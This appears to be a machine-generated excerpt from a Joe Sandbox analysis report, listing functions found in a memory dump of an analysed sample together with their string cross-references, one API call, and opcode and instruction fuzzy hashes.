Opcode Fuzzy Hash: e133a7b7fa4b30eba9d8dd8762af5ae8fa74075651ce804875519ff4ab040977
Instruction Fuzzy Hash: 2AD15EB49007419FD720EF39D586752BFF0EB12300F544AAED8EA4B786D334A45ACB96

Function 00408EB0 Relevance: 5.3, Strings: 4, Instructions: 299COMMON

Download Yara Rule

Strings

MP, xrefs: 00408F12
", xrefs: 00408FC8
`]0o, xrefs: 00408FA0
mooj, xrefs: 00408F90

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID: "$MP$`]0o$mooj
API String ID: 0-750224902
Opcode ID: b1852bd034d5f07e6c7418944058fbcc2db243f872094cebdf7b16bddf70df29
Instruction ID: b19b03646b16de912904001b94da70090da2d56033d31c768745f7e78282d27d
Opcode Fuzzy Hash: b1852bd034d5f07e6c7418944058fbcc2db243f872094cebdf7b16bddf70df29
Instruction Fuzzy Hash: EC71183150D3929AD711CF29849077BFFE1AF96344F1889BED4C4AB387C639890AC766

Function 0041AA90 Relevance: 4.4, Strings: 3, Instructions: 606COMMON

Download Yara Rule

Strings

]Z, xrefs: 0041AEFC
YF, xrefs: 0041B0CB
>j%h, xrefs: 0041B0E5

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID: >j%h$YF$]Z
API String ID: 0-4187760579
Opcode ID: 315e0b80a172105bdb6125941b7bc3327eb2f506a6e5818f00821b26c43edc6d
Instruction ID: 9eece3b8ce7a95ea6ecb53f0b37b23c6ac9ce84f3b4a74f9026e79692fb54b94
Opcode Fuzzy Hash: 315e0b80a172105bdb6125941b7bc3327eb2f506a6e5818f00821b26c43edc6d
Instruction Fuzzy Hash: CD02037160C3009BD7189F25C8916AFBBF2EFD5314F08892DE4D58B382E7399946C78A

Function 00427F8D Relevance: 4.2, Strings: 3, Instructions: 445COMMON

Download Yara Rule

Strings

XdVX, xrefs: 00427FCD
YvIp, xrefs: 00427FC5
/4*, xrefs: 00427FB5

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID: /4*$XdVX$YvIp
API String ID: 0-3691241376
Opcode ID: fb236006c250ffc211ebc7f89fcda9cf565e59ebe00033e2a4db332be92296be
Instruction ID: 349303a26e76b7dc74c53abfd61c9fa2d29ce462f76cb6652ed4d54e95d8ee3a
Opcode Fuzzy Hash: fb236006c250ffc211ebc7f89fcda9cf565e59ebe00033e2a4db332be92296be
Instruction Fuzzy Hash: CEE115B46083918FD7148F25D89126FBBE1EF96304F08886DF5C59B382DA39D846CB5A

Function 004095A0 Relevance: 4.1, Strings: 3, Instructions: 375COMMON

Download Yara Rule

Strings

CF0E57EB70DF1D8FB960CC18D99B375A, xrefs: 00409665
no, xrefs: 004098B8
JO}, xrefs: 00409780

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID: CF0E57EB70DF1D8FB960CC18D99B375A$JO}$no
API String ID: 0-1702865644
Opcode ID: 39d72df67d6d4dec9bb311bdf5152167ba102bc258e75940eeb29ed02a9edc23
Instruction ID: a84f769f8163236c19afa71ab8ebfca9a7e40634951dcb5e8a3fb7dd6940477d
Opcode Fuzzy Hash: 39d72df67d6d4dec9bb311bdf5152167ba102bc258e75940eeb29ed02a9edc23
Instruction Fuzzy Hash: 5AC1F3B160C3408BD718DF35D8916AFBBE2EBD2304F144A2DE5D29B392DA38C509CB56

Function 00419710 Relevance: 4.0, Strings: 3, Instructions: 239COMMON

Download Yara Rule

Strings

Nw, xrefs: 004197EE
qp, xrefs: 004197F6
4, xrefs: 004197FE

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID: 4$Nw$qp
API String ID: 0-4265586298
Opcode ID: 07ee0dda83b10c6babdba6f7f560729ff036302cd3f30b88450a197e3d0d674c
Instruction ID: 1c14353b01c87222b99498af661210a9029df4456b24b55d3972913cfd48c548
Opcode Fuzzy Hash: 07ee0dda83b10c6babdba6f7f560729ff036302cd3f30b88450a197e3d0d674c
Instruction Fuzzy Hash: 0A61E5719183518BC728DF29C8612BBB7E1EFC6314F094A6EE9D69B391D7388C05C786

Function 00419470 Relevance: 4.0, Strings: 3, Instructions: 230COMMON

Download Yara Rule

Strings

0, xrefs: 004194C2
~, xrefs: 004194F0
}, xrefs: 004194EB

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID: 0$}$~
API String ID: 0-1378824556
Opcode ID: 884f6f9cf58a5a59d449aea1ec521a8ac50cc9cc68e7f295d775d02287a41394
Instruction ID: cc2bc466ecf6dadc7518a70f2b95efd366e8ae182a12733c5a40e6e465e138fe
Opcode Fuzzy Hash: 884f6f9cf58a5a59d449aea1ec521a8ac50cc9cc68e7f295d775d02287a41394
Instruction Fuzzy Hash: A7711832F0DA944BCB19897C4C212EA7A934BD3230F2DC3BED9B5973E5D4684D468399

Function 0042E5C2 Relevance: 3.9, Strings: 3, Instructions: 189COMMON

Download Yara Rule

Strings

)2^, xrefs: 0042E6C0
|lx1, xrefs: 0042E71D
khvr, xrefs: 0042E716

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID: )2^$khvr$|lx1
API String ID: 0-2191243274
Opcode ID: 4ccf6364555e8cdb5bfd8096454ae9d86d60a5367683d88ebbcbe3196d12286d
Instruction ID: 4de4a3a3beb6c19d42a4d3ade4e4e91008c027f5d3f459ded0861b50ff37b2bd
Opcode Fuzzy Hash: 4ccf6364555e8cdb5bfd8096454ae9d86d60a5367683d88ebbcbe3196d12286d
Instruction Fuzzy Hash: 27412974605691CBD7158F3AD490772BBA2AF9B304F5C85ADC4C78B396C6389846CB18

Function 0042DD30 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 167COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(D7DADAD1), ref: 0042DE55

Strings

3Z{, xrefs: 0042DDA0

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID: FreeLibrary
String ID: 3Z{
API String ID: 3664257935-2331068373
Opcode ID: 52e2302ab1351103ee4792a9557da4963a6bcc2172eb5e395f038b61ae502095
Instruction ID: 974a3689560b078f5541bff02c23d3e4bc65e838cbd55ddb6ad84d7362020e57
Opcode Fuzzy Hash: 52e2302ab1351103ee4792a9557da4963a6bcc2172eb5e395f038b61ae502095
Instruction Fuzzy Hash: F641F1706047819FE7268F249890B63BFE1AF67304F28449DE4D65F392D72A9806CB65

Function 00413E50 Relevance: 3.4, Strings: 2, Instructions: 884COMMON

Download Yara Rule

Strings

EA, xrefs: 004145D2
NP,?, xrefs: 00414270

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID: NP,?$EA
API String ID: 0-3550630486
Opcode ID: c8b8e796abceac3594a91b638e490a64fbfa8cc7ef476cca3c0e389b64e5e7b0
Instruction ID: 2e7f34938e04f27cbf53eb242d69fe801042e8981dab05c8edde02431b6dd9ba
Opcode Fuzzy Hash: c8b8e796abceac3594a91b638e490a64fbfa8cc7ef476cca3c0e389b64e5e7b0
Instruction Fuzzy Hash: 5E4222B4608201DBD7148F28E841BBB73A1FF86328F154A2DF591572E1E778EC55C78A

Function 00404C00 Relevance: 3.3, Strings: 2, Instructions: 792COMMON

Download Yara Rule

Strings

0, xrefs: 0040551B
8, xrefs: 00405513

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 6c0d5d3be257b6a3fd1de638671c8b12e5484a8c530135887e69e884293760cf
Instruction ID: ccb06c0a2e0de9deaa04bce5d562da717ac6b95b8a28923c7ff2a21ca4b657dd
Opcode Fuzzy Hash: 6c0d5d3be257b6a3fd1de638671c8b12e5484a8c530135887e69e884293760cf
Instruction Fuzzy Hash: 967235B1508341AFD710CF18C884BABBBE1AF84314F44892EF9999B391C779D958CF96

Function 0041E250 Relevance: 3.2, Strings: 2, Instructions: 677COMMON

Download Yara Rule

Strings

eA, xrefs: 0041EAFB
)A, xrefs: 0041EB71

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID: )A$eA
API String ID: 0-3047952920
Opcode ID: f17ea89f4d1b368da92741cca1a27be89d7296a3ee0b739eace175103a64188a
Instruction ID: a0969c83d05d4ee8c97119b57e028d19e1de82d2bfa65bbec59b05e925b9ead1
Opcode Fuzzy Hash: f17ea89f4d1b368da92741cca1a27be89d7296a3ee0b739eace175103a64188a
Instruction Fuzzy Hash: EE6270B0609B818ED335CF3C8815797BFD5AB5A324F148A5EE0FA873D2C77561028B66

Function 0041F710 Relevance: 3.0, Strings: 2, Instructions: 527COMMON

Download Yara Rule

Strings

LMB, xrefs: 0041F7EF
pv, xrefs: 0041F797

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID: LMB$pv
API String ID: 0-122907696
Opcode ID: 600361d03a19618f7b8b94130096601f70c9cb3cba6cb4618556b265baeca412
Instruction ID: 3eeefadaa77a5fd53610c3ddf5e6e08206d1469657b97126345bc7f1514b4473
Opcode Fuzzy Hash: 600361d03a19618f7b8b94130096601f70c9cb3cba6cb4618556b265baeca412
Instruction Fuzzy Hash: 17E134B15183008BD3249F29C8623ABB7F1EFD2314F19892DD5C68B3A5E7799846C786

Function 0042CCA0 Relevance: 3.0, Strings: 2, Instructions: 512COMMON

Download Yara Rule

Strings

", xrefs: 0042D0DE
", xrefs: 0042D150

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID: "$"
API String ID: 0-3758156766
Opcode ID: 54e3175d32b773b9e9c1025c84d052112ddd069704eaf9d2eb6da4d3bace2a73
Instruction ID: 61e0fe3940d769720f6f4791c22ea050c43e4b3387fc0a82dac58289e7fab3aa
Opcode Fuzzy Hash: 54e3175d32b773b9e9c1025c84d052112ddd069704eaf9d2eb6da4d3bace2a73
Instruction Fuzzy Hash: A1F11272B083258FC714CE24D48076BB7D6AFC4314F99896EE8998B392D738DD09C786

Function 0042ABC0 Relevance: 3.0, Strings: 2, Instructions: 454COMMON

Download Yara Rule

Strings

a, xrefs: 0042AA9B
1, xrefs: 0042AEF8

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID: 1$a
API String ID: 0-297133789
Opcode ID: c5f74b42330831985239496e1d4f39fb0a653775eb781e006d056080418a89d4
Instruction ID: 50b0e87344bede7c61e37aabca88bd69b4ed90587826eff82c5637a773e23675
Opcode Fuzzy Hash: c5f74b42330831985239496e1d4f39fb0a653775eb781e006d056080418a89d4
Instruction Fuzzy Hash: 95E16875608320CFD3149F28AC4126B77E2EB86314F49496EE9D197392E738AD19C78B

Function 0041B200 Relevance: 2.9, Strings: 2, Instructions: 440COMMON

Download Yara Rule

Strings

45, xrefs: 0041B562
uw, xrefs: 0041B2A7

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID: 45$uw
API String ID: 0-851133776
Opcode ID: ab637dcdc1d75d2e8c1a6476f08b4d58cc792c803b02a06a08f3a248bcfca3ae
Instruction ID: e49b2e20cfe9ba5ce7cb5790c572c6cd382ddd2734a676778ebff5933d168dd8
Opcode Fuzzy Hash: ab637dcdc1d75d2e8c1a6476f08b4d58cc792c803b02a06a08f3a248bcfca3ae
Instruction Fuzzy Hash: A6C121745083048BC718CF28C8926ABB3F1EFC5314F19C96EE8968B391E778D945C796

Function 0043C410 Relevance: 2.8, Strings: 2, Instructions: 349COMMON

Download Yara Rule

Strings

mij, xrefs: 0043C6A1
NP,?, xrefs: 0043C620

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID: NP,?$mij
API String ID: 0-1436015776
Opcode ID: b0905b15df5a93d70dff43b587df237d303d7f495d29f252faf92cbeebdeaadb
Instruction ID: d401854fd2cc12c548c1ecfb90c4d04a7bab5840ee8d20629697b9478a788be7
Opcode Fuzzy Hash: b0905b15df5a93d70dff43b587df237d303d7f495d29f252faf92cbeebdeaadb
Instruction Fuzzy Hash: BAA159756043109BD314DF25C8C162BB7A1EBC9728F24662EE9A5373D1D338EC018BDA

Function 004042D0 Relevance: 2.8, Strings: 2, Instructions: 329COMMON

Download Yara Rule

Strings

), xrefs: 0040434B
IEND, xrefs: 004046C1

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: 68ec6af04dd140ff68b0080ca3686c18edbdf247115d4d432d89b22d16dc4d31
Instruction ID: b5c58118511f7ab27c9ce5a77da79783a4285a76a4993dc0d68ffacd4de415e2
Opcode Fuzzy Hash: 68ec6af04dd140ff68b0080ca3686c18edbdf247115d4d432d89b22d16dc4d31
Instruction Fuzzy Hash: 2BD1C2B1A083449FD710CF14D84175BBBE4ABD5308F14492EFA98AB3C2D779E904CB96

Function 0041C370 Relevance: 2.8, Strings: 2, Instructions: 273COMMON

Download Yara Rule

Strings

}, xrefs: 0041C415
~, xrefs: 0041C41A

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID: }$~
API String ID: 0-3846021004
Opcode ID: 574856a951496172c10f24d6272443698a4463c6339c9a7123374a18d19c9391
Instruction ID: a6f5a58453f41cefe64683c3ca1862db3038e1f21351879acc05657e814d8347
Opcode Fuzzy Hash: 574856a951496172c10f24d6272443698a4463c6339c9a7123374a18d19c9391
Instruction Fuzzy Hash: 0591153674EA914BC719893C4C513EAAF934BD7230F2DC76EE8F58B3D2D52888468356

Function 00433810 Relevance: 2.7, Strings: 2, Instructions: 239COMMON

Download Yara Rule

Strings

~, xrefs: 004338B6
}, xrefs: 004338B1

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID: }$~
API String ID: 0-3846021004
Opcode ID: 9c651afb8884db2b8ed531508840d92c93680f60ef013fdbb885d5c65550ea95
Instruction ID: 10eb8eb1221c810e9ff21c9e5650af260ae2c54e12271e75aa51dbd00d3cd542
Opcode Fuzzy Hash: 9c651afb8884db2b8ed531508840d92c93680f60ef013fdbb885d5c65550ea95
Instruction Fuzzy Hash: A9714B2660D6D14BD7289E3C4C113AABED20FD7231F2CD7AEE4F5873E2D56989028346

Function 00436140 Relevance: 2.7, Strings: 2, Instructions: 234COMMON

Download Yara Rule

Strings

}, xrefs: 004361C9
~, xrefs: 004361CE

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID: }$~
API String ID: 0-3846021004
Opcode ID: b89aeb8f7c5bc573797a562e5b9ad2442b0305510d530974ee3cfcaf6155a88d
Instruction ID: 2b4f25648cf012893ecccc6bc10ba7d797c7576365e8f899a19edef63a8e56f2
Opcode Fuzzy Hash: b89aeb8f7c5bc573797a562e5b9ad2442b0305510d530974ee3cfcaf6155a88d
Instruction Fuzzy Hash: 36717C2270DA814BD728493C8C513AABE830BDB330F2ED77EE5F18B3D2D5A988059345

Function 0042DFAF Relevance: 2.6, Strings: 2, Instructions: 124COMMON

Download Yara Rule

Strings

M"O, xrefs: 0042E87A
fI.K, xrefs: 0042E873

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID: M"O$fI.K
API String ID: 0-3473069917
Opcode ID: 80b5e25900e62fa5b7f868b9038989c12ce663ab15b6782b2becc0f24b60a991
Instruction ID: 329e37de618e8a484b718af78b4319e64e69ed5ee2b204ae71a9d2e2a7026588
Opcode Fuzzy Hash: 80b5e25900e62fa5b7f868b9038989c12ce663ab15b6782b2becc0f24b60a991
Instruction Fuzzy Hash: 6431F275204691CBE7058F2AD450332FBE2EFA2310F69959DC0C69B392C679A8038B98

Function 0042E7EB Relevance: 2.6, Strings: 2, Instructions: 108COMMON

Download Yara Rule

Strings

M"O, xrefs: 0042E87A
fI.K, xrefs: 0042E873

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID: M"O$fI.K
API String ID: 0-3473069917
Opcode ID: a50f177498f9f56b16f7faf9ec1f3eef4274cbe2d8e1a906e5367dc70dca7c59
Instruction ID: f6fd3104235a574d950e3c7a6e1b37e2e28bb9fd8ddddb0b7385076b5cae7f54
Opcode Fuzzy Hash: a50f177498f9f56b16f7faf9ec1f3eef4274cbe2d8e1a906e5367dc70dca7c59
Instruction Fuzzy Hash: 9531E4752047418BE705CF2AD850723FBE2EFA6310F69959DC0C59F392CA79A843CB88

Function 00411078 Relevance: 2.1, APIs: 1, Instructions: 560COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03fa9a4ef5fc09b88c951e717f6d84c64096d515bfc5bfa11bc015a710778202
Instruction ID: ffeaf69f11ebdaa19ebbeb2c849f1362720ea4a43f49444d7a0805305d646c0f
Opcode Fuzzy Hash: 03fa9a4ef5fc09b88c951e717f6d84c64096d515bfc5bfa11bc015a710778202
Instruction Fuzzy Hash: C3220875604B408FC714DF38C48539ABBE2AF85314F15892ED9EB873A2E639E549CB43

Function 00414C9C Relevance: 2.0, Strings: 1, Instructions: 784COMMON

Download Yara Rule

Strings

UGS0, xrefs: 0041546F

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID: UGS0
API String ID: 0-520979954
Opcode ID: dfb94d8d359fc81a05778ab09c2605d52757e9ab0d7f5b57afd7d332d254ecac
Instruction ID: 3348e13afeb0dd66d0b42f92764ac4a19cd9e9b65c21c83913ba49dcaa38d822
Opcode Fuzzy Hash: dfb94d8d359fc81a05778ab09c2605d52757e9ab0d7f5b57afd7d332d254ecac
Instruction Fuzzy Hash: 8332B174200B01CFD725CF29D891BA3B7A2FF86314F19869DD4968B7A1D774E882CB94

Function 00441910 Relevance: 1.9, Strings: 1, Instructions: 646COMMON

Download Yara Rule

Strings

r!D, xrefs: 0044215B

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID: r!D
API String ID: 0-1427830086
Opcode ID: 8066b95fdf58a8485039f6bd82a37e953757c2e5cc5a4bfb8100e9cc80e20a61
Instruction ID: 3cbef11c9a3ce934bd2371589f199791f426b11a6ad4740408174b3a4e74d17a
Opcode Fuzzy Hash: 8066b95fdf58a8485039f6bd82a37e953757c2e5cc5a4bfb8100e9cc80e20a61
Instruction Fuzzy Hash: 6B121039718211CFD708CF38D89062AB3E2FB8A315F1A897ED58687365D734D891CB85

Function 0043CAA7 Relevance: 1.9, Strings: 1, Instructions: 620COMMON

Download Yara Rule

Strings

_\, xrefs: 0043CFC2

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID: _\
API String ID: 0-505892539
Opcode ID: e151fd77c1b513c9d1fc853a18fbbb0d5f395fcc726f05ed7b31c23f364176dd
Instruction ID: 387b8c9453b82b61d9c904b796da75a3b5f1fa39b900c3c8147bbc4438cb0180
Opcode Fuzzy Hash: e151fd77c1b513c9d1fc853a18fbbb0d5f395fcc726f05ed7b31c23f364176dd
Instruction Fuzzy Hash: 4C12E03AA18352CBC7149F38D84226BB7E2EF89310F0AC939D48597290E77CDA65C756

Function 00441A56 Relevance: 1.8, Strings: 1, Instructions: 520COMMON

Download Yara Rule

Strings

r!D, xrefs: 0044215B

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID: r!D
API String ID: 0-1427830086
Opcode ID: 85603856905c4a4f195af4f24670044c03e48a4b33cd73fa0abfa814962da6a1
Instruction ID: a06da2a7510bafe70ce3d2561cf559b616cef3d484291c66b41e0c515b2c2d32
Opcode Fuzzy Hash: 85603856905c4a4f195af4f24670044c03e48a4b33cd73fa0abfa814962da6a1
Instruction Fuzzy Hash: D0E1EC39719251CFD708CF38D89066AB3E2FB8A315F1A897ED58683365C738D851CB85

Function 00441A94 Relevance: 1.7, Strings: 1, Instructions: 498COMMON

Download Yara Rule

Strings

r!D, xrefs: 0044215B

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID: r!D
API String ID: 0-1427830086
Opcode ID: 6f878ccae5c505e2ff999e0c01f97702648bc5fa6a6966721696372b96f72e3e
Instruction ID: c755686a4332cf064cea235db5d2835f48d151b631f4c01ad3b162a843bf9e1f
Opcode Fuzzy Hash: 6f878ccae5c505e2ff999e0c01f97702648bc5fa6a6966721696372b96f72e3e
Instruction Fuzzy Hash: 11E1EC39718211CFD708CF38D89066AB3E2FB8A315F1A897DD58A83365C738D851CB85

Function 00441B40 Relevance: 1.7, Strings: 1, Instructions: 445COMMON

Download Yara Rule

Strings

r!D, xrefs: 0044215B

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID: r!D
API String ID: 0-1427830086
Opcode ID: dd782d22cddc781079d978155dd15ba88b5c707dba8ff791ed422af05367eedc
Instruction ID: 449aedb15a5c66098da17fa39f105c8c994b9e20c3147fb75fcf3787673fd1a6
Opcode Fuzzy Hash: dd782d22cddc781079d978155dd15ba88b5c707dba8ff791ed422af05367eedc
Instruction Fuzzy Hash: 19D1DD3A719251CFD708CF38D89062AB3E2FB8A315F1A897DD58A87361D738D851CB85

Function 0041BE00 Relevance: 1.7, Strings: 1, Instructions: 443COMMON

Download Yara Rule

Strings

}, xrefs: 0041C28B

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID: }
API String ID: 0-4239843852
Opcode ID: 6fb93c91da6cfd1c4245782af60370d1767e41f090d3b747876532802dd19a64
Instruction ID: 26ba260b14138d9a95a984c8e0db81d50ed88c365ec99f1f3b2d9ff95aad7ec5
Opcode Fuzzy Hash: 6fb93c91da6cfd1c4245782af60370d1767e41f090d3b747876532802dd19a64
Instruction Fuzzy Hash: 8BE10231588301AFD7108F24CC85B9BBBE1EFD5354F148A2EF4D4A72A1D739D9858B8A

Function 00441BD0 Relevance: 1.7, Strings: 1, Instructions: 410COMMON

Download Yara Rule

Strings

r!D, xrefs: 0044215B

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID: r!D
API String ID: 0-1427830086
Opcode ID: 6a383e139219aa4231859b86b0c43952a01f5ba8d69cd62de4ce561c2214cff1
Instruction ID: 3943c725ea9c2734471285e08a6d116742d81fc3d3d880d0a4650d4c70a6e07e
Opcode Fuzzy Hash: 6a383e139219aa4231859b86b0c43952a01f5ba8d69cd62de4ce561c2214cff1
Instruction Fuzzy Hash: F5C1DD3A618251CFD708CF38D8A066AB7E2FF8A315F1A897DD58687361D738D841CB85

Function 00441C60 Relevance: 1.7, Strings: 1, Instructions: 409COMMON

Download Yara Rule

Strings

r!D, xrefs: 0044215B

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID: r!D
API String ID: 0-1427830086
Opcode ID: f7188ad9813d7bfbb9cf9dd212625e88cc0244e77462d4219da92fe6ff4728d1
Instruction ID: 20006929f050a8e451167e2d48fe52922d1d07b002cce6178d4b46f5f936f5fe
Opcode Fuzzy Hash: f7188ad9813d7bfbb9cf9dd212625e88cc0244e77462d4219da92fe6ff4728d1
Instruction Fuzzy Hash: 15C1E03A618250CFD708CF38D89066AB7E2FBCA315F1A897DD486833A5D738D951CB85

Function 00445260 Relevance: 1.6, Strings: 1, Instructions: 383COMMON

Download Yara Rule

Strings

0010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899, xrefs: 00445295

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID: 0010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899
API String ID: 0-2906481384
Opcode ID: ebfef1ad2e5f0ae0fc11dfa951c2e9a1cdf2f2d47bd2eafce344264ff08ccd98
Instruction ID: 7624d9cdbcbb60f14c25e1c3414aa4c782415caab118c012dd216e983edb56f0
Opcode Fuzzy Hash: ebfef1ad2e5f0ae0fc11dfa951c2e9a1cdf2f2d47bd2eafce344264ff08ccd98
Instruction Fuzzy Hash: 28C17FB546D3D1AEDB979F3084912A37FA0EF4B71935661EEC9C38E423C1219483DB82

